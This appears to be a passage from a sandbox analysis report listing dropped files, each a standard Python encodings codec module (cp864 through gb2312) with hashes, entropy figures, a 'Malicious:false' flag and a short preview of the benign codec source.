                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP864.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp864',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp865.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35316
                                                                                                                                                                                                  Entropy (8bit):4.589958887283082
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:RQVLCZkjh4wVXjIVSxAEJHWJn4AVUVcqPMy:PqjhJVz5xAEJ2BFfS
                                                                                                                                                                                                  MD5:FE9E2A87FF8164A9602AF05FE30F64FC
                                                                                                                                                                                                  SHA1:3BEC0843F48826EC25A9D660B9A578148085D82F
                                                                                                                                                                                                  SHA-256:0722BBF3A0F93700E99B3816E9E52C75674E14319146F9AC3FD1E17F87E66CB0
                                                                                                                                                                                                  SHA-512:B1C5797EC453694C0E285084F25B7825C13C59B2754DE58319745923784BB5105485883C6E8BDDFEAC3267EE8E9CDD34A76155282C2AD774CEF58FBC6AC476FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP865.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp865',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp866.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35094
                                                                                                                                                                                                  Entropy (8bit):4.600424943983017
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:lHLsuYDvRI0CnFdiaYzFFwrE0PXRN/h4wcuSMXY3uD8HtIMpW5449jBRWJn4bkV1:EVMYkjh4wVXYrxcHWJn4AVo0kQMy
                                                                                                                                                                                                  MD5:BE6B4AAAD297AE734F59800072CCAA30
                                                                                                                                                                                                  SHA1:6FE723B5DA8606EC26DC4523AA6F6EEEDACD16E0
                                                                                                                                                                                                  SHA-256:E3A033B3B790018A0A02E9F67A03530753C7FB5F94B6ABA84F5173D29FB389AE
                                                                                                                                                                                                  SHA-512:5E4B443A4778EAF7ECFA41E88CC259A6ABB2CCA0F578F7F72800C201D280C3AC033528EBF1043862DD64896DDEA444190FFF29C6EC7AEB6DE00B5E6C7EBAA86C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP866.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp866',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp869.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33654
                                                                                                                                                                                                  Entropy (8bit):4.583176642392538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9XtKOodhREjkjh4wV+TRLMCXkWDoq4HWJn4AV+/S0sOkYmPr:UhR1jhJVBukWDo72BFEEN
                                                                                                                                                                                                  MD5:FC295CB9BF854E29A7EAB588DF20A662
                                                                                                                                                                                                  SHA1:F9D95ED00BBCB7CB89661A0BB93880BF08A70802
                                                                                                                                                                                                  SHA-256:4322E184D3C1DFA56EDB013E895CBFB71130E7846F8F56BCAFC4C0082373CB6A
                                                                                                                                                                                                  SHA-512:0167CC25A48AB6B09F08233CD51C8C622AF7014642BE6E9A72F37EA8C459F67CAE04DFED076E8148C512747CD775457442528F1963CE3F677FE3B5F45AD71C1B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP869.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp869',.. encode=Codec().encode,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp874.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12902
                                                                                                                                                                                                  Entropy (8bit):4.624503078499216
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:KHhsuOTDvRHUrXPLouhIAs2+iRvskDCYnO00pC8i1bE:nThuhIAlX/H8iG
                                                                                                                                                                                                  MD5:5E2C1051F63CEB3600F970937C5FC6E4
                                                                                                                                                                                                  SHA1:062664CD22F5DC7A52E99EDCC9C5D356C2B6F841
                                                                                                                                                                                                  SHA-256:94179E22722674527BD56386B5E9DAC5427B0F55248D1AA63E204C105DA18D8B
                                                                                                                                                                                                  SHA-512:B6643A970DDF837CA060CB511C4AFA2E4224657450455BDAEF1980ED122791991FD13BAEFD56DE10A63FC1248EAB26478EE0B0B82B0E884FCEDD71D85DCB84F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp874 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP874.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp874',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp875.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13161
                                                                                                                                                                                                  Entropy (8bit):4.598690745287678
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LHhsuOTDvRUUZkPS3RI4WcMHFVleIuiZdH77eDVqeOFf2nuS:eT5RIzc+gi72DcdFOnb
                                                                                                                                                                                                  MD5:3DAB3DF72E688978781C91CEA3285C4A
                                                                                                                                                                                                  SHA1:65664E8974B621B2C461774187C483ABFA0E735F
                                                                                                                                                                                                  SHA-256:5C42ADFEC39CF9D891FBB2ED19D882C6160A00B8487B7867F9E2296B9E2F491B
                                                                                                                                                                                                  SHA-512:7F940428049BCB0A95FC67FC178749B61ABF522646A68505B5B420718E5BD8ABBF6973B48CBF17DDA48179ABBA4D31F1E2169DBD5EFA33C044414A7A02673899
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp875 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp875',.. e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp932.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                  Entropy (8bit):4.549007604127859
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:n5oqwOzff/XohaZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj93cJxFpz:Oqpwhat62VJjRU8njOxLnrxLbrLKmJx/
                                                                                                                                                                                                  MD5:70E562A99A8F07255F47C5F3C05518A5
                                                                                                                                                                                                  SHA1:F1F0A00A3238B19786D88B83F9FA57D043E2D0A9
                                                                                                                                                                                                  SHA-256:F917DB40F96F9F676E45FD9F1A7FA5D9BBB67A703BDF88B546CA4DA84C4905F5
                                                                                                                                                                                                  SHA-512:48C7BF7FDA257EC6ECC4421BFEF66E026C285DABB358ED41DDB6A9FFC6D73F61DA35F25A5622FC8D9D4D086D4BFA37E67A40810D39A6FA5F538F61427304298A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# cp932.py: Python Unicode Codec for CP932..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('cp932')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp932',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp949.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                  Entropy (8bit):4.532318933180232
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:no53qzqOzSf/XoxKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9+6cJxFV:otqzHzl62VJjRU8njOxLnrxLbrLK03Jd
                                                                                                                                                                                                  MD5:D85D0503255F9363D30F7B7AAD7355D4
                                                                                                                                                                                                  SHA1:DE0F8989F4BBE4CC9A91241DEED093BF259E2DC1
                                                                                                                                                                                                  SHA-256:DA13FD6F1BD7A1D3B48AED1FC75F7516D6A33814086CF971E030625590E9DDA0
                                                                                                                                                                                                  SHA-512:ED408E5A0B1042E0F1F94CF57171381F4B2A0491B9319BF2E0E02DB8B63BF342D7C4091B97DA8F9802B6EA0AE94EFFBE797F17E92F25E5F436BD88E11E4735B7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# cp949.py: Python Unicode Codec for CP949..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('cp949')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp949',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp950.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                  Entropy (8bit):4.541713907609811
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nqqqhOz6f/XoHKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFplR:qqVLj62VJjRU8njOxLnrxLbrLKWJxTz
                                                                                                                                                                                                  MD5:15D67984C7486D079058D4DBA07DDBBE
                                                                                                                                                                                                  SHA1:51AE51CD6ED99E4B594A5EFF1621308AA89DE532
                                                                                                                                                                                                  SHA-256:8FD6E86DFB38006E753B3B0301AA4B377C64C25F4EC9E6333FC99C3F06E90917
                                                                                                                                                                                                  SHA-512:46F3A96CE463669D8AD256C53C84EE201FB3D1EC0BEEEE55E622E75E93D1C9AA272BC0A414F3E65123C9BB1972BEEC9A8F43B2B9ACF849A2361DB188EE3F7836
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# cp950.py: Python Unicode Codec for CP950..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('cp950')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp950',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\euc_jis_2004.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                  Entropy (8bit):4.603655042489424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nsqVsOzff/XoL2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9TcJxFplR:sqHwU62VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                                  MD5:F1FAE768C9FF8329D237608533530CED
                                                                                                                                                                                                  SHA1:3167902E4F9294DB74131FA2CE505E2F62B9C9B4
                                                                                                                                                                                                  SHA-256:78265BA431395662E7252A9B79BC2A75FFE438DB872B2CF1CBCFB243D83F0C87
                                                                                                                                                                                                  SHA-512:F726B7652435D174D1D84578A9278DD6B751B62CE231247CE4299860A5A4B2E1DB1D243B370625633D526278D30F2D05BBEBA9FC9E8312A103C455C65E802D68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# euc_jis_2004.py: Python Unicode Codec for EUC_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\euc_jisx0213.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                  Entropy (8bit):4.624592201957947
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nrqLOzff/XoL1KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqAwl62VJjRU8njOxLnrxLbrLKLJxTz
                                                                                                                                                                                                  MD5:45A11BD69244CE2DCC3FF49206AD041B
                                                                                                                                                                                                  SHA1:C0FF2F0406F4158D26DA4FC850584D14764FCA55
                                                                                                                                                                                                  SHA-256:12CA22A7DB25D9EEEF9BF5FACDC5594E3165CCF451528D36E3B68A03989521AC
                                                                                                                                                                                                  SHA-512:06AFD42F84A6E83A55645C82A638A7AF6C545401570EB3871913060FCBCC8D348583F589E3133745A6584998493C35DE25F66336E7D4F48EAC1BFDD6C35D08D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# euc_jisx0213.py: Python Unicode Codec for EUC_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\euc_jp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1066
                                                                                                                                                                                                  Entropy (8bit):4.531522047071056
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:n9qNOzff/XoLjKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9KcJxFplR:9q2wL62VJjRU8njOxLnrxLbrLKlJxTz
                                                                                                                                                                                                  MD5:0F2187EA4FC89DA2F54522EF29F58A7F
                                                                                                                                                                                                  SHA1:9DE39800CBBD630D7D4A1504C1A07F334EF3FAC5
                                                                                                                                                                                                  SHA-256:8927683A4234B936BE1935B8A799BE78520438BB5EA072499D51E7FE3D182987
                                                                                                                                                                                                  SHA-512:61BDFF78DE0A5E781C47F692620F7ACCD78AA006F530D478502A0905D51312B499E119F2EAA5524F2CEEF3CC4950F2865A1EFCFFF23BB4B9702579E0F3AEC97C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# euc_jp.py: Python Unicode Codec for EUC_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\euc_kr.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1066
                                                                                                                                                                                                  Entropy (8bit):4.509188463695804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nSBqnChOzSf/Xoap0KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9DJFc3:EqnXzao62VJjRU8njOxLnrxLbrLK9J+3
                                                                                                                                                                                                  MD5:B6EF8BD54861FA5D1E0AFF68F50F2913
                                                                                                                                                                                                  SHA1:3CB1AC8785AF724B359BEFBFC3758D918067B77A
                                                                                                                                                                                                  SHA-256:03AFE0CF8020529EAD00A0EA26A7131D354994CD2352D42F9032216B3748EA91
                                                                                                                                                                                                  SHA-512:B8147C8F711BC1ACE96FB2769F79A54728F7A744FCCD3AA4BE1257E8F09507DEDE44CF9F5C1F089BB88F11A88D372874EB343BB48AFE639A6C7E8D27204BFA05
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# euc_kr.py: Python Unicode Codec for EUC_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('euc_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\gb18030.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1070
                                                                                                                                                                                                  Entropy (8bit):4.573121414528306
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nBMqgOz+f/Xo1GoKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9zcJxFpz:Wq5P1l62VJjRU8njOxLnrxLbrLKSJxTz
                                                                                                                                                                                                  MD5:40B18EE51A3241C53EF5CBC6C019997D
                                                                                                                                                                                                  SHA1:C4F48863B74CB56844A2CC68AF9629D9407B7CF7
                                                                                                                                                                                                  SHA-256:0D9C1DB7E2959E60E4F6CB4B97C884585668C55B48F2D9D715B2BDAF5E78C671
                                                                                                                                                                                                  SHA-512:12952CBED997D8E4F3608F2DA4BA0FAC468D7D48E7685556E3669AF18FC6C238688713894E4490AACDC05C253242ADE9C88E522DC45EB9D5827E29548108D5AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# gb18030.py: Python Unicode Codec for GB18030..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb18030')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb18030',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\gb2312.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1066
                                                                                                                                                                                                  Entropy (8bit):4.554621344303813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nB6q6Oz+f/Xo11ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9jcJxFpz:oq3P11t62VJjRU8njOxLnrxLbrLK+Jx/
                                                                                                                                                                                                  MD5:72F02C10927F33B52DF6549FF1F52E60
                                                                                                                                                                                                  SHA1:6C666F6A4C36D0C3CBD944216E170E26D7B5D91A
                                                                                                                                                                                                  SHA-256:2B5573EBF7FDC20DCF126633ADF0B7283C08629D36DBEFA669C985C9DDB98EA7
                                                                                                                                                                                                  SHA-512:F7F0D5C10490026F0809714BEED7CB2F5AB284C7BDC05BCBDF7C690A255DBA59F815B5524D88F5ED35CD6FD668C93695126EF7153CCBFA5B58BAA5E151839C51
